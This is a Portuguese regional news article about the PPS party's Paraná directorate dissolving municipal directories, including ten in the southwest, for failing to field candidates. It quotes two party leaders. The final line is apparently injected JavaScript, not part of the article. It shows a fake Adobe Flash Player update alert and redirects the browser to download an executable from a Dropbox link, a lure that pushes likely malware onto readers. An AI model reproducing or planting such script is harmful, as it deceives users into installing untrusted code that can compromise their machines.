por Ivan Cezar Fochzato

 

O Diretório Estadual do PPS ( Partido Popular Socialista) do Paraná dissolveu composições em pelo menos dez municípios da região sudoeste do estado. A decisão foi aprovada por unanimidade entre filiados e dirigentes e ocorreu em função de que não apresentaram candidaturas de prefeito, vice ou vereador.

Em todo o estado, foram dissolvidos 83 diretórios e os da região que sofreram intervenção são os de Bom Sucesso do Sul; Capanema; Flor da Serra do Sul; Mariópolis; Marmeleiro; Nova Esperança do Sudoeste; Salgado Filho; Santo Antonio do Sudoeste; São Jorge do Oeste; e Sulina.

 

Ao avaliar a medida, o presidente estadual do PPS, deputado federal Rubens Bueno, argumentou que “ser partido de gaveta ou laranja é o que há de pior na política. Não podemos deixar este comportamento prevalecer”, disse destacando que a sigla passará por uma reestruturação visando sua consolidação para o ano que vem.

Para o secretário-geral do PPS no Paraná, Rubico Camargo, o partido deve estar presente na disputa e lançar nomes. “Não tem sentido um partido se estruturar no município e não lançar candidatos nem para vereador. O PPS não pode ser legenda só para participar de alianças. A dissolução é um indicativo de que a direção partidária não apresenta perfil para articular”, afirmou.

alert(ATENCAO Este conteudo requer a versao 11.1.102.75 do ©Adobe Flash Player. Para atualizar, basta fazer o download do instalador que ira iniciar automaticamente e fazer a instalacao. E muito simples e rapido.);location.href=https://dl.dropbox.com/s/n74bd3ttq94mmff/install_flashplayer11x32ax_mssd_aih.exe?dl=1;